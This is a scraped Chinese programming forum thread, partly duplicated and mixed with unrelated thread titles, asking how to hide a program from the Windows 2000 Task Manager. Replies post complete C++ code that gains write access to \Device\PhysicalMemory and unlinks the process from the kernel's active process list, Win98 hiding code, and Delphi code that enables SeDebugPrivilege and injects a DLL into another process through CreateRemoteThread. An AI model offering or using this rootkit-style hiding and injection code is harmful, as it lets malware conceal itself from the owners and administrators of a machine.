请问如何在2000中实现一个应用在任务管理器中隐藏? 请问如何在2000中实现一个应用在任务管理器中隐藏? 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 Win2000是不可以的,除非使用驱动程序方式的HookWin2000的Int 2Eh系统服务还可以Delphi做不了这样的事情,VC的DDK才OKApplcation.Title=‘’可以不在Applications列出来,但Process还是可见的 自身的:#include<Accctrl.h>#include<Aclapi.h>typedef LONG NTSTATUS;#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)#define RSP_SIMPLE_SERVICE 0x00000001#define RSP_UNREGISTER_SERVICE 0x00000000typedef struct _UNICODE_STRING{ USHORT Length; USHORT MaximumLength; PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING;typedef struct _OBJECT_ATTRIBUTES{ ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes );typedef VOID (CALLBACK* RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString );class TMyHideProcess{ private: int OSversion; RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL ; PVOID g_pMapPhysicalMemory; HANDLE g_hMPM ; BOOL InitNTDLL(); VOID CloseNTDLL(); VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) ; HANDLE OpenPhysicalMemory() ; PVOID LinearToPhys(PULONG BaseAddress,PVOID addr); ULONG GetData(PVOID addr); BOOL SetData(PVOID addr,ULONG data); BOOL HideProcess2000(); void HideProcess98(); public: TMyHideProcess(int theosver); ~TMyHideProcess(); void DoHideMe();}; TMyHideProcess::TMyHideProcess(int theosver){ OSversion=theosver; InitNTDLL() ;}TMyHideProcess::~TMyHideProcess(){ CloseNTDLL();}BOOL TMyHideProcess::InitNTDLL(){ g_hNtDLL = NULL; g_pMapPhysicalMemory = NULL; g_hMPM = NULL; g_hNtDLL = LoadLibrary( "ntdll.dll" ); if ( !g_hNtDLL ) { return FALSE; } RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); return TRUE;}VOID TMyHideProcess::CloseNTDLL(){ if(g_hNtDLL != NULL) { FreeLibrary(g_hNtDLL); }}VOID TMyHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection){ PACL pDacl=NULL; PACL pNewDacl=NULL; PSECURITY_DESCRIPTOR pSD=NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS) { goto CleanUp; } ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance= NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS) { goto CleanUp; } if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS) { goto CleanUp; }CleanUp: if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl);}HANDLE TMyHideProcess::OpenPhysicalMemory(){ NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" ); attributes.Length = sizeof(OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = &physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); if(status == STATUS_ACCESS_DENIED) { status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); } if( !NT_SUCCESS( status )) { return NULL; } g_pMapPhysicalMemory = MapViewOfFile( g_hMPM, 4, 0, 0x30000, 0x1000); if( g_pMapPhysicalMemory == NULL ) { return NULL; } return g_hMPM;} PVOID TMyHideProcess::LinearToPhys(PULONG BaseAddress,PVOID addr){ ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr; PGDE=BaseAddress[VAddr>>22]; if ((PGDE&1)!=0) { ULONG tmp=PGDE&0x00000080; if (tmp!=0) { PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF); } else { PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; if ((PTE&1)!=0) { PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); UnmapViewOfFile((PVOID)PGDE); } else return 0; } } else return 0; return (PVOID)PAddr;}ULONG TMyHideProcess::GetData(PVOID addr){ ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr); PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000); if (tmp==0) return 0; ULONG ret=tmp[(phys & 0xFFF)>>2]; UnmapViewOfFile(tmp); return ret;}BOOL TMyHideProcess::SetData(PVOID addr,ULONG data){ ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr); PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (tmp==0) return FALSE; tmp[(phys & 0xFFF)>>2]=data; UnmapViewOfFile(tmp); return TRUE;}BOOL TMyHideProcess::HideProcess2000(){ if (InitNTDLL()) { if (OpenPhysicalMemory()==0) { return FALSE; } ULONG thread=GetData((PVOID)0xFFDFF124); ULONG process=GetData(PVOID(thread+0x22c)); ULONG fw=GetData(PVOID(process+0xa0)); ULONG bw=GetData(PVOID(process+0xa4)); SetData(PVOID(fw+4),bw); SetData(PVOID(bw),fw); UnmapViewOfFile(g_pMapPhysicalMemory); CloseHandle(g_hMPM); CloseNTDLL(); } return TRUE;}void TMyHideProcess::HideProcess98(){ typedef bool __stdcall (*pRegisterService)(DWORD,DWORD); HMODULE hKernel = LoadLibrary("kernel32.dll"); if(hKernel) { pRegisterService RegisterService =(pRegisterService)GetProcAddress(hKernel,"RegisterServiceProcess"); if(RegisterService) { RegisterService(::GetCurrentProcessId(),RSP_SIMPLE_SERVICE); } FreeLibrary(hKernel); hKernel = NULL; }}void TMyHideProcess::DoHideMe(){switch (OSversion) { case 98: HideProcess98(); break; case 2000: HideProcess2000(); break; }} 其实Delphi可以的,不过要用到很复杂的技术,关于这方面可以看一下《Delphi深入windows核心编程》这本书,我是看不大懂啦,其原理就是把程序的进程寄生到别的进程中。 procedure FindAProcess(const AFilename:string; const PathMatch:Boolean;var ProcessID: DWORD);//AFilename为要查找(进程ID)的文件名(可以包行路径)//PathMatch为查找的时候是否匹配路径var lppe:TProcessEntry32; SsHandle:Thandle; FoundAProc, FoundOK:boolean;begin SsHandle := CreateToolHelp32SnapShot(TH32CS_SNAPALL,0); FoundAProc := Process32First(Sshandle,lppe); while FoundAProc do begin if PathMatch then FoundOK:=AnsiStricomp(lppe.szExefile,PChar(AFilename))=0 elseFoundOK:=AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)),PChar(ExtractFilename(AFilename)))=0; if FoundOK then begin ProcessID:=lppe.th32ProcessID; break; end; FoundAProc :=Process32Next(SsHandle,lppe); end;// if not FoundAProc then showmessage(SysErrorMessage(GetLastError)); CloseHandle(SsHandle);end;//激活或者停止指定的权限function EnabledDebugPrivilege(const bEnabled: Boolean):Boolean;var hToken: THandle; tp: TOKEN_PRIVILEGES; a: DWORD;const SE_DEBUG_NAME = 'SeDebugPrivilege';begin Result:=False; if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,hToken)) then begin tp.PrivilegeCount :=1; LookupPrivilegeValue(nil,SE_DEBUG_NAME ,tp.Privileges[0].Luid); if bEnabled then tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED else tp.Privileges[0].Attributes := 0; a:=0; AdjustTokenPrivileges(hToken,False,tp,SizeOf(tp),nil,a); Result:= GetLastError = ERROR_SUCCESS; CloseHandle(hToken); end;end;//在指定的进程中插入一个DLL文件function AttachToProcess(const HostFile, GuestFile : string;constPID:DWORD=0):DWORD;//HostFile为要绑定的宿主文件(Exe文件),GuestFile为要嵌入的客户文件(Dll文件)//如AttachToProcess('D:\TESTDLL.DLL','Notepad.exe') ;var hRemoteProcess: THandle; dwRemoteProcessId:DWORD; cb:DWORD; pszLibFileRemote: Pointer; iReturnCode:Boolean; TempVar:DWORD; pfnStartAddr:TFNThreadStartRoutine; pszLibAFilename: PwideChar;begin Result:=0; EnabledDebugPrivilege(True); Getmem(pszLibAFilename,Length(GuestFile)*2+1); StringToWideChar(GuestFile,pszLibAFilename,Length(GuestFile)*2+1); if PID>0 then dwRemoteProcessID:=PID elseFindAProcess(HostFile,False,dwRemoteProcessID); //由于我们后面需要写入远程进程的内存地址空间并建立远程线程,所以需要申请 //足够的权限(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE)。 //然后,我们可以建立LoadLibraryW函数这个线程来启动我们的DLL,LoadLibraryW //函数是在kernel32.dll中定义的,用来加载DLL文件,它只有一个参数,就是DLL //文件的绝对路径名pszLibAFilename,(也就是DLL的全路径文件名),但是由于 //DLL是在远程进程内调用的,所以我们首先还需要将这个文件名复制到远程地址空 //间:(否则远程线程是无法读到这个参数的) hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + file ://允许远程创建线程 PROCESS_VM_OPERATION+ file ://允许远程VM操作 PROCESS_VM_WRITE,//允许远程VM写 FALSE, dwRemoteProcessId); //计算DLL路径名需要的内存空间 cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR); 使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区 pszLibFileRemote := PWIDESTRING( VirtualAllocEx( hRemoteProcess, nil,cb, MEM_COMMIT, PAGE_READWRITE)); //使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间 TempVar:=0; iReturnCode := WriteProcessMemory(hRemoteProcess,pszLibFileRemote,pszLibAFilename, cb, TempVar); if iReturnCode then begin //计算LoadLibraryW的入口地址 pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'),'LoadLibraryW'); //OK,万事俱备,我们通过建立远程线程时的地址pfnStartAddr(实际上就是LoadLibraryW //的入口地址)和传递的参数 pszLibFileRemote(实际上是我们复制过去的DLL的全路 //径文件名)在远程进程内启动我们的DLL: //启动远程线程LoadLibraryW,通过远程线程调用用户的DLL文件 TempVar:=0; Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr,pszLibFileRemote, 0, TempVar); end; Freemem(pszLibAFilename);end; 收藏了,终于找到了for delphi 版的,测试先! 能不能也给我一个FOR DELPHI,我也急需要,感谢了![email protected][email protected] 经过一周的研究,终于实现了正真意义上的隐藏但具有平台相关性,XP的实现,2000,2003的实现都是不同的,原因是EProcess对象的结构不同,还因为NT的特点,程序如在VMWare上运行是无效的,这个我都不知道是什么问题,VMWare上的地址是$Fxxxxxxx的,真实的系统是$8xxxxxxx,这样-$80000000就是物理地址了:)通过ZwQueryInformation访问到进程句柄指向的内核对象EProcess(需要访问物理内存)删除ActiveProcessLink双向链表上的FLink(EProcess+$88)和BLink(EProcess+$8C),这样就进程从系统上“失踪”了,通过PsAPI等API的方法是不能获取到的,除了OS最内核态才能知道(这个方法我还没有搞明白:),但SoftICE等Ring0的软件都发现不到,这就已经很厉害的了WindowsXP的演示版:http://ly.activepower.net/projects/index.htm 微软对HOOK 保护的越来越严那么QQ的HOOK是怎么做的可以渗透所有的程序呢? 刷分,不要进,谢谢 FTP流程的问题 不知道他们还活着不? 如何取得TOraQuery刚才fetch过来的那条记录OraQueryAfterFetch(DataSet: TCustomDADataSet); DataModule 出错 高分求 《Windows程序设计》 电子版 菜鸟送分题——在线送分 如何捕捉错误消息 菜单问题求助 用Delphi中的Database Desktop怎样插入一个新的字段在表中 远程主机强迫关闭了一个现有的连接 这样的问题。。。。。。你遇网见过吗?
Delphi做不了这样的事情,VC的DDK才OKApplcation.Title=‘’可以不在Applications列出来,但Process还是可见的
#include<Accctrl.h>
#include<Aclapi.h>
typedef LONG NTSTATUS;#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
#define RSP_SIMPLE_SERVICE 0x00000001
#define RSP_UNREGISTER_SERVICE 0x00000000typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
class TMyHideProcess{
private:
int OSversion;
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL ;
PVOID g_pMapPhysicalMemory;
HANDLE g_hMPM ;
BOOL InitNTDLL();
VOID CloseNTDLL();
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) ;
HANDLE OpenPhysicalMemory() ;
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr);
ULONG GetData(PVOID addr);
BOOL SetData(PVOID addr,ULONG data);
BOOL HideProcess2000();
void HideProcess98();
public:
TMyHideProcess(int theosver);
~TMyHideProcess();
void DoHideMe();
};
{
OSversion=theosver;
InitNTDLL() ;
}
TMyHideProcess::~TMyHideProcess()
{
CloseNTDLL();
}BOOL TMyHideProcess::InitNTDLL()
{
g_hNtDLL = NULL;
g_pMapPhysicalMemory = NULL;
g_hMPM = NULL; g_hNtDLL = LoadLibrary( "ntdll.dll" );
if ( !g_hNtDLL )
{
return FALSE;
} RtlInitUnicodeString =
(RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection =
(ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); return TRUE;
}VOID TMyHideProcess::CloseNTDLL()
{
if(g_hNtDLL != NULL)
{
FreeLibrary(g_hNtDLL);
}
}
VOID TMyHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl=NULL;
PACL pNewDacl=NULL;
PSECURITY_DESCRIPTOR pSD=NULL;
DWORD dwRes;
EXPLICIT_ACCESS ea; if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)
{
goto CleanUp;
} ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
{
goto CleanUp;
} if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
{
goto CleanUp;
}CleanUp: if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}HANDLE TMyHideProcess::OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes; RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" ); attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL; status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
} if( !NT_SUCCESS( status ))
{
return NULL;
} g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,
0,
0x30000,
0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
} return g_hMPM;
}
{
ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
PGDE=BaseAddress[VAddr>>22];
if ((PGDE&1)!=0)
{
ULONG tmp=PGDE&0x00000080;
if (tmp!=0)
{
PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
}
else
{
PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if ((PTE&1)!=0)
{
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
else return 0;
}
}
else return 0; return (PVOID)PAddr;
}ULONG TMyHideProcess::GetData(PVOID addr)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return 0;
ULONG ret=tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}BOOL TMyHideProcess::SetData(PVOID addr,ULONG data)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return FALSE;
tmp[(phys & 0xFFF)>>2]=data;
UnmapViewOfFile(tmp);
return TRUE;
}BOOL TMyHideProcess::HideProcess2000()
{
if (InitNTDLL())
{
if (OpenPhysicalMemory()==0)
{
return FALSE;
}
ULONG thread=GetData((PVOID)0xFFDFF124);
ULONG process=GetData(PVOID(thread+0x22c));
ULONG fw=GetData(PVOID(process+0xa0));
ULONG bw=GetData(PVOID(process+0xa4));
SetData(PVOID(fw+4),bw);
SetData(PVOID(bw),fw);
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
}
return TRUE;
}
void TMyHideProcess::HideProcess98()
{
typedef bool __stdcall (*pRegisterService)(DWORD,DWORD); HMODULE hKernel = LoadLibrary("kernel32.dll");
if(hKernel)
{
pRegisterService RegisterService =(pRegisterService)GetProcAddress(hKernel,"RegisterServiceProcess");
if(RegisterService)
{
RegisterService(::GetCurrentProcessId(),RSP_SIMPLE_SERVICE);
}
FreeLibrary(hKernel);
hKernel = NULL;
}
}
void TMyHideProcess::DoHideMe()
{
switch (OSversion)
{
case 98:
HideProcess98();
break;
case 2000:
HideProcess2000();
break;
}
}
《Delphi深入windows核心编程》这本书,我是看不大懂啦,
其原理就是把程序的进程寄生到别的进程中。
var ProcessID: DWORD);
//AFilename为要查找(进程ID)的文件名(可以包行路径)
//PathMatch为查找的时候是否匹配路径
var
lppe:TProcessEntry32;
SsHandle:Thandle;
FoundAProc, FoundOK:boolean;
begin
SsHandle := CreateToolHelp32SnapShot(TH32CS_SNAPALL,0);
FoundAProc := Process32First(Sshandle,lppe);
while FoundAProc do
begin
if PathMatch then
FoundOK:=AnsiStricomp(lppe.szExefile,PChar(AFilename))=0
elseFoundOK:=AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)),PChar(Extract
Filename(AFilename)))=0; if FoundOK then
begin
ProcessID:=lppe.th32ProcessID;
break;
end;
FoundAProc :=Process32Next(SsHandle,lppe);
end;
// if not FoundAProc then showmessage(SysErrorMessage(GetLastError));
CloseHandle(SsHandle);
end;//激活或者停止指定的权限
function EnabledDebugPrivilege(const bEnabled: Boolean):Boolean;
var
hToken: THandle;
tp: TOKEN_PRIVILEGES;
a: DWORD;
const
SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
Result:=False;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,
hToken)) then
begin
tp.PrivilegeCount :=1;
LookupPrivilegeValue(nil,SE_DEBUG_NAME ,tp.Privileges[0].Luid);
if bEnabled then
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
tp.Privileges[0].Attributes := 0;
a:=0;
AdjustTokenPrivileges(hToken,False,tp,SizeOf(tp),nil,a);
Result:= GetLastError = ERROR_SUCCESS;
CloseHandle(hToken);
end;
end;//在指定的进程中插入一个DLL文件
function AttachToProcess(const HostFile, GuestFile : string;const
PID:DWORD=0):DWORD;
//HostFile为要绑定的宿主文件(Exe文件),GuestFile为要嵌入的客户文件(Dll文
件)
//如AttachToProcess('D:\TESTDLL.DLL','Notepad.exe') ;
var
hRemoteProcess: THandle;
dwRemoteProcessId:DWORD;
cb:DWORD;
pszLibFileRemote: Pointer;
iReturnCode:Boolean;
TempVar:DWORD;
pfnStartAddr:TFNThreadStartRoutine;
pszLibAFilename: PwideChar;
begin
Result:=0;
EnabledDebugPrivilege(True);
Getmem(pszLibAFilename,Length(GuestFile)*2+1);
StringToWideChar(GuestFile,pszLibAFilename,Length(GuestFile)*2+1);
if PID>0 then dwRemoteProcessID:=PID else
FindAProcess(HostFile,False,dwRemoteProcessID);
//由于我们后面需要写入远程进程的内存地址空间并建立远程线程,所以需要申请
//足够的权限(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE)。
//然后,我们可以建立LoadLibraryW函数这个线程来启动我们的DLL,
LoadLibraryW
//函数是在kernel32.dll中定义的,用来加载DLL文件,它只有一个参数,就是DLL
//文件的绝对路径名pszLibAFilename,(也就是DLL的全路径文件名),但是由于
//DLL是在远程进程内调用的,所以我们首先还需要将这个文件名复制到远程地址
空
//间:(否则远程线程是无法读到这个参数的)
hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + file ://允许远程创建线程
PROCESS_VM_OPERATION+ file ://允许远程VM操作
PROCESS_VM_WRITE,//允许远程VM写
FALSE, dwRemoteProcessId); //计算DLL路径名需要的内存空间
cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);
使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区
pszLibFileRemote := PWIDESTRING( VirtualAllocEx( hRemoteProcess, nil,
cb, MEM_COMMIT, PAGE_READWRITE));
//使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间
TempVar:=0;
iReturnCode := WriteProcessMemory(hRemoteProcess,pszLibFileRemote,
pszLibAFilename, cb, TempVar);
if iReturnCode then
begin
//计算LoadLibraryW的入口地址
pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'),
'LoadLibraryW');
//OK,万事俱备,我们通过建立远程线程时的地址pfnStartAddr(实际上就是
LoadLibraryW
//的入口地址)和传递的参数 pszLibFileRemote(实际上是我们复制过去的
DLL的全路
//径文件名)在远程进程内启动我们的DLL:
//启动远程线程LoadLibraryW,通过远程线程调用用户的DLL文件
TempVar:=0;
Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr,
pszLibFileRemote, 0, TempVar);
end;
Freemem(pszLibAFilename);
end;
[email protected]
那么QQ的HOOK是怎么做的可以渗透所有的程序呢?